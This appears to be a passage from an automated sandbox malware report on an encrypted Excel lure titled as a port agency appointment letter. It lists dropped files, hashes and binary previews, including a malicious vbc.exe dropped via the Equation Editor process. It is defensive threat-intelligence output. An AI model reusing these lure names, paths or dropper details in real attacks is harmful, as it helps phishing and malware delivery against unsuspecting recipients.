                                                                                                                                                                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E25AB663.emf
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):648132
                                                                                                                                                                                                    Entropy (8bit):2.8124530118203914
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                                                                                                                                                                                                    MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                                                                                                                                                                                                    SHA1:F677467423105ACF39B76CB366F08152527052B3
                                                                                                                                                                                                    SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                                                                                                                                                                                                    SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF212C1B.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):49744
                                                                                                                                                                                                    Entropy (8bit):7.99056926749243
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                                                                                                                                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                                                                                                                                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                                                                                                                                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                                                                                                                                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2F42597.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):79394
                                                                                                                                                                                                    Entropy (8bit):7.864111100215953
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\liw53s6e5g55t9
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):164864
                                                                                                                                                                                                    Entropy (8bit):7.998820292327425
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:Qqr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4S:drlEXrPB2EtLTvbh21eq4S
                                                                                                                                                                                                    MD5:68A3F57B8B343B5F9BF05C9F35A086A3
                                                                                                                                                                                                    SHA1:29015249F259A9AAF76D3AD6774019CFBBD118FD
                                                                                                                                                                                                    SHA-256:D2D0C6EC98898B2B21BE258090B267AA98A5C4FEA808B37DC7BBAF38B900246F
                                                                                                                                                                                                    SHA-512:36538D7036BB092DC2E126387DAE328FB68EA53D3D7F8F3126AA986117EC569B32F11EC925192F75C1C7FA225BAF1C4BA88551F1AAF860444139E4A8ECC68B33
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: Q.Uc5.0..@..C6.,.(.../7...1.H]..$9.p.].#.|......?.2.e.$..3p....:.Dt .<...[...=.kJ.p(|Y.#I:Eq.....T...!);A......u.t.....*....IZo..z..2..S...h.pu.&.?.]....U.@9*.V.:.......d.-..........C..I.8...8nZ..k.....jRY..../.P.....a...h..\.{gv.m22........r..8g....A..<....I.N.L..LB+.A.|..9........l.L..'...>aQ6..K.|.^P..%.Hu.{.....c^.....r..>.X.j6+/.1..E#m../.x....h..<.#.p.G...!..p.~.H.SL..%...j.Cg.}V....p....:..z.-H.....%57`.._I..........l.....,x .jU....<.h-6L..."-yy...X.KA.$YT......z.$].R..>..M@q.)...6F.v27|l.4.@b!.h.I6{@.%..aP.~..HcX..%.<.h../.A....;.....:..X.Na....A.s,:..&..F..q..'.r.(!,..p.^..+.......F..%.?..>......c.e........Y......A@}....Ke..W{j.^?.xnD.I.g......,.....`...b.....yu.6.]....ud.U.z.1.?@-..6u.-.`..K*..$.T9J..bo....K.WA ....,:.Sd[Iz#.txD..)...v.....}.....]..4L.....^...:B....4|..sM..Q..2....mK...>.D~....+8[?.=.9..X!r.4.......~..c.!d}...hR&ee.`..... ......d....G..G...k..}...._#G..O..{....hw....s23p....-v.5...p.......,...F.^W....T..P".
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsoA17F.tmp
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):261211
                                                                                                                                                                                                    Entropy (8bit):7.359115600393562
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:7Sa/qr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4l20fjumGLPNt:WaSrlEXrPB2EtLTvbh21eq4V7LGLFt
                                                                                                                                                                                                    MD5:AB8B0B65B223CDF58819B06790B548E2
                                                                                                                                                                                                    SHA1:0B678EAD9F82893461CC99EF27BEF78A3F3115F8
                                                                                                                                                                                                    SHA-256:205ACFB8E6DCF7203E2CE11F386D70851ABA48F2D7FF011A0B750E8092F94D29
                                                                                                                                                                                                    SHA-512:FA39DFB9E056C2EFFB8C1F28339C9A7487C3239E2042E8DFE7ECD87FC510A32824B1A5AADF98BFA57B3039736AB8317241453FB6BB6DAAE7208FC64A685125CB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .m......,.......................LP......$l.......l..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11776
                                                                                                                                                                                                    Entropy (8bit):5.855045165595541
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                                                                                                    MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                                                                                                    SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                                                                                                    SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                                                                                                    SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: YZ8OvkljWm.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: U03c2doc.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: QUOTE061021.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: PAYMENT CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\xpwbfoj
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):56641
                                                                                                                                                                                                    Entropy (8bit):4.976767365562505
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:Y3DnyBc/8CaRs3+Z06O2vxZODPqSjlr7GBOEEjHzYtfgcBGUePl72zvHzUfysnp3:i4opae+Z0z0wr7G3EjT8cd72DUpGLu
                                                                                                                                                                                                    MD5:92B8B4963350C3A198E9513D086FBB3C
                                                                                                                                                                                                    SHA1:8B365235930D9864D7CA3D3A8B67E61D314EA560
                                                                                                                                                                                                    SHA-256:7CE31FC69C94A1917273EB7BF938EFB0BA57EDA5281E20BE8EF13E7D8BA302F9
                                                                                                                                                                                                    SHA-512:75C83B2DCE7EB57B059FA4C9C50A7F308CD2521868EB83011F15C51E96489C15E987D72B0907BF59698924140306D6348578BF114CABB0A0C1A86FC033FE02C1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: U...........D.....E...B.F.....G.....H.....I.....J...?.K.....L.....M...v.N.....O.....P.....Q...?.R.....S...5.T.....U...p.V.....W.....X.....Y...7.Z.....[...P.\.....]...{.^....._...|.`.....a.....b.....c.....d...A.e.....f.....g...=.h.....i...T.j...7.k...1.l...|.m.....n...(.o.....p...?.q.....r...T.s...z.t.....u.....v...?.w.....x...T.y.....z...=.{.....|...T.}...?.~.........|...........=...........|.................{...........t.............................A.....9.............................=...........x.....7.....1.....t...........(...........?...........x.....z.................?...........x...........=...........x.....?...........t...........=...........t.................{...........l.............................A.....9.............................=...........p.....7.....1.....l...........(...........?...........p.....z.................?...........p
                                                                                                                                                                                                    C:\Users\user\Desktop\~$Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                    C:\Users\Public\vbc.exe
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):225177
                                                                                                                                                                                                    Entropy (8bit):7.913752075626111
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:DQIURTXJ+MwMy2ZeD0EUquupJDoeGgFq+HAgDtI7LXZ2sQYvvlIieO82WbyXVvE4:Ds9wMReDph9AOI7LXosQQBBFsuyQUvnk
                                                                                                                                                                                                    MD5:116E736BA00FCA4B8499C4DF00796454
                                                                                                                                                                                                    SHA1:A8D3D62DB4BD49E24C2BDA3D0D81C3BE25A81DAE
                                                                                                                                                                                                    SHA-256:096CA35528EF4F702E93F5F17D7954F26FB48ACD4526794CE1EE99D27CF1A4C3
                                                                                                                                                                                                    SHA-512:02DDAB82DD68FAA0627C15320DE3E0B118B1CC95FEE80FC013E57ED773A9420AF5B23F3BB7F9CCAC216C88581B665DB29BD1CA5E03F7E0B52F9C542D75B57F78
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:CDFV2 Encrypted
                                                                                                                                                                                                    Entropy (8bit):7.995575769527791
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                                    File name:Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx
                                                                                                                                                                                                    File size:1331416
                                                                                                                                                                                                    MD5:27211c2dc1809cc2ab4469ff246f9cb4
                                                                                                                                                                                                    SHA1:735918b9ed26c5eafa266305fcf677bd2ee5f0a2
                                                                                                                                                                                                    SHA256:b4b855d04e706c33129c2db1c80d8b05497fa56a2288ef2fb4e631fe42aa781f
                                                                                                                                                                                                    SHA512:23b42410a678e708454869c32857a93e40a4d00a2a28afdd5e03a6b1de53c197c389d844c3dec7d7f3f62539d458091cc4ba1e163890978da566c42bb190c0f7
                                                                                                                                                                                                    SSDEEP:24576:LS5w5NLTHyglJ6nYEuTBj2cAOrnbmKpcCd+p/5I541u4pHq0n:LS5wjTHplJfEuTJ+qbmKBd+dEC
                                                                                                                                                                                                    File Content Preview:........................>...............................................................................................................z.......{.......~......................................................................................................

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                                    OLE File "Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx"

                                                                                                                                                                                                    Indicators

                                                                                                                                                                                                    Has Summary Info:False
                                                                                                                                                                                                    Application Name:unknown
                                                                                                                                                                                                    Encrypted Document:True
                                                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                                                    Contains Workbook/Book Stream:False
                                                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                                                    Contains VBA Macros:False

                                                                                                                                                                                                    Streams

                                                                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:64
                                                                                                                                                                                                    Entropy:2.73637206947
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:112
                                                                                                                                                                                                    Entropy:2.7597816111
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:208
                                                                                                                                                                                                    Entropy:3.35153409046
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x6DataSpaces/Version
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:76
                                                                                                                                                                                                    Entropy:2.79079600998
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 1317080
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:EncryptedPackage
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:1317080
                                                                                                                                                                                                    Entropy:7.99982695424
                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . / . . . . F . . . ; . W . . . 0 . 7 9 . . . . . . . . j k . . . . . . . : M . . . . B 9 3 F o . > . . y ' . . E j . , N . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W
                                                                                                                                                                                                    Data Raw:ca 18 14 00 00 00 00 00 b4 ad 1b 2f eb 20 cc d6 85 46 d9 e3 99 3b d7 57 e5 96 17 30 c0 37 39 12 ea bf 1e bd 85 04 b7 6a 6b 9b 19 dd 87 e6 93 be 3a 4d 8a c2 c3 bf 42 39 33 46 6f ad 3e f3 b0 79 27 a5 09 45 6a 94 2c 4e 92 68 71 ee 66 72 c6 57 5e 87 08 c3 f9 78 02 af 92 68 71 ee 66 72 c6 57 5e 87 08 c3 f9 78 02 af 92 68 71 ee 66 72 c6 57 5e 87 08 c3 f9 78 02 af 92 68 71 ee 66 72 c6 57
                                                                                                                                                                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:EncryptionInfo
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:224
                                                                                                                                                                                                    Entropy:4.67936203517
                                                                                                                                                                                                    Base64 Encoded:False
